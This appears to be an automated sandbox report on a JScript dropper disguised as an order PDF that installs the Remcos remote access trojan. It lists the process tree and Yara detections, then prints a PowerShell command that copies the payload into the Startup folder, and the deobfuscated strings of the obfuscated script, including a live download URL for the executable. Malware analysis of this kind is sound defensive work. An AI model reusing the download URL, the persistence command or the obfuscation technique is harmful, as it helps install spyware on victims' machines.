                                                                                                        2022-11-03 22:35:57 UTC594INData Raw: 01 43 7f 73 5a 28 9f 24 7c a0 35 40 06 fa 94 af 0a a1 83 b6 13 e4 4b 15 06 5e 6a 8a 20 34 71 7b bb 25 ad 3f 5b 0a a4 1f 2f 6c 7d 2e 61 51 d0 8c 59 37 3e a6 5d f1 1e 5d 80 b6 d8 1f 60 e3 cd 12 6a 88 1f c6 fe 18 cb 93 43 56 7a c7 ce 03 d6 00 64 28 56 22 b1 4b 19 d2 f0 96 c9 44 1f 39 5d 9c b0 96 ed 5a 49 8d 7e 72 e4 43 6b 7f c9 a0 3f 6c 4a ad d5 00 4f bd 0a b8 83 c5 bd 98 2c 07 76 01 70 45 de c3 f0 42 69 ea ff 26 cc 03 44 1f 16 28 e1 6a 74 b6 9c 45 fa b6 3a ce 94 d1 1f bd 8c 65 aa fd fc c3 3c e8 0d 9c 38 66 d5 fc 7d 1e 9b 59 8c 91 5a 42 57 55 50 16 0d 4b 74 72 ee a0 2a 31 fc 26 02 34 f9 64 1b 59 fd e3 3a d4 e8 b8 41 29 74 01 3f 0d e0 13 77 2b 11 3c fb 3d cd d0 e7 e1 97 5b 55 f7 2a 03 6d d5 cd 62 da ce 9c 1e fc ea 70 7d e6 7d 4b 68 ce 5a 29 61 d3 a0 5c 25 b3
                                                                                                        Data Ascii: CsZ($|5@K^j 4q{%?[/l}.aQY7>]]`jCVzd(V"KD9]ZI~rCk?lJO,vpEBi&D(jtE:e<8f}YZBWUPKtr*1&4dY:A)t?w+<=[U*mbp}}KhZ)a\%


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:23:34:58
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js"
                                                                                                        Imagebase:0x7ff742790000
                                                                                                        File size:163840 bytes
                                                                                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:10
                                                                                                        Start time:23:35:59
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
                                                                                                        Imagebase:0x540000
                                                                                                        File size:613184 bytes
                                                                                                        MD5 hash:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 65%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:11
                                                                                                        Start time:23:36:03
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
                                                                                                        Imagebase:0x160000
                                                                                                        File size:430592 bytes
                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Reputation:high

                                                                                                        Target ID:12
                                                                                                        Start time:23:36:03
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6da640000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:13
                                                                                                        Start time:23:36:12
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Imagebase:0xa80000
                                                                                                        File size:45152 bytes
                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:high

                                                                                                        Target ID:17
                                                                                                        Start time:23:37:58
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe"
                                                                                                        Imagebase:0x6b0000
                                                                                                        File size:613184 bytes
                                                                                                        MD5 hash:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 65%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        Target ID:18
                                                                                                        Start time:23:38:09
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
                                                                                                        Imagebase:0x160000
                                                                                                        File size:430592 bytes
                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Reputation:high

                                                                                                        Target ID:19
                                                                                                        Start time:23:38:10
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6da640000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:20
                                                                                                        Start time:23:38:27
                                                                                                        Start date:03/11/2022
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Imagebase:0xdc0000
                                                                                                        File size:45152 bytes
                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Call Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C4 clusterC8C6 clusterC10C6 clusterC12C6 clusterC14C6 clusterC16C6 clusterC18C6 clusterC20C6 clusterC22C4 clusterC24C22 clusterC26C22 clusterC28C22 clusterC30C2 clusterC32C0 clusterC34C32 clusterC36C32 clusterC38C32 clusterC40C32 clusterC42C32 clusterC44C32 clusterC46C32 clusterC48C0 clusterC50C48 clusterC52C0 clusterC54C52 clusterC56C52 clusterC58C52 clusterC60C52 clusterC62C52 clusterC64C0 clusterC66C0 clusterC68C0 clusterC70C68 clusterC72C70 clusterC74C70 clusterC76C74 clusterC78C74 clusterC80C74 clusterC82C74 clusterC84C70 clusterC86C84 clusterC88C84 clusterC90C0 clusterC92C90 clusterC94C0 clusterC96C94 clusterC98C94 clusterC100C0 clusterC102C100 E1C0 entry:C0 F3C2 _0x5099 E1C0->F3C2 F33C32 E1C0->F33C32 F49C48 _0x1c3e E1C0->F49C48 F65C64 _0x155c25 E1C0->F65C64 F67C66 _0x56566c E1C0->F67C66 F3C2->F3C2 F101C100 _0x3974 F3C2->F101C100 F5C4 F31C30 'eDkGFb' F5C4->F31C30 F7C6 F9C8 'charAt' F7C6->F9C8 F11C10 'fromCharCode' F7C6->F11C10 F13C12 'indexOf' F7C6->F13C12 F15C14 'slice' F7C6->F15C14 F17C16 'toString' F7C6->F17C16 F19C18 'charCodeAt' F7C6->F19C18 F21C20 decodeURIComponent F7C6->F21C20 F23C22 F25C24 _0x12b176 F23C22->F25C24 F27C26 'charCodeAt' F23C22->F27C26 F29C28 'fromCharCode' F23C22->F29C28 F33C32->F3C2 F35C34 _0x33d5a0 F33C32->F35C34 F37C36 parseInt F33C32->F37C36 F39C38 _0x29007c F33C32->F39C38 F41C40 'push' F33C32->F41C40 F43C42 'shift' F33C32->F43C42 F45C44 'push' F33C32->F45C44 F47C46 'shift' F33C32->F47C46 F49C48->F49C48 F95C94 _0x4a61 F49C48->F95C94 F51C50 F53C52 F53C52->F3C2 F53C52->F49C48 F55C54 _0x16801f F53C52->F55C54 F57C56 parseInt F53C52->F57C56 F59C58 _0x3b90fe F53C52->F59C58 F61C60 _0x16324c F53C52->F61C60 F63C62 'push' F53C52->F63C62 F69C68 _0x5b6c F69C68->F69C68 F69C68->F95C94 F71C70 F71C70->F3C2 F73C72 _0x562b2c F71C70->F73C72 F75C74 F75C74->F3C2 F77C76 _0x1315bc F75C74->F77C76 F79C78 'indexOf' F75C74->F79C78 F81C80 'slice' F75C74->F81C80 F83C82 decodeURIComponent F75C74->F83C82 F85C84 F85C84->F3C2 F87C86 _0x1c1988 F85C84->F87C86 F89C88 _0x4eb5d1 F85C84->F89C88 F91C90 _0xe99d F91C90->F91C90 F91C90->F101C100 F93C92 F95C94->F3C2 F95C94->F95C94 F97C96 _0x126005 F95C94->F97C96 F99C98 F101C100->F101C100 F103C102

                                                                                                        Script:

                                                                                                        Code
                                                                                                        0
                                                                                                        function _0x5099(_0x304024, _0x5125dd) {
                                                                                                        • _0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef"
                                                                                                        • _0x5099(213,"SewZ") ➔ undefined
                                                                                                        • _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D"
                                                                                                        • _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c"
                                                                                                        • _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\."
                                                                                                        • _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf"
                                                                                                        • _0x5099(255,"CZq%") ➔ undefined
                                                                                                        • _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C"
                                                                                                        • _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96"
                                                                                                        • _0x5099(266,"SewZ") ➔ "8|\x0e\xf1\xed\xd1x"
                                                                                                        1
                                                                                                        var _0x3974d = _0x3974 ( );
                                                                                                        • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                        • _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
                                                                                                        • _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
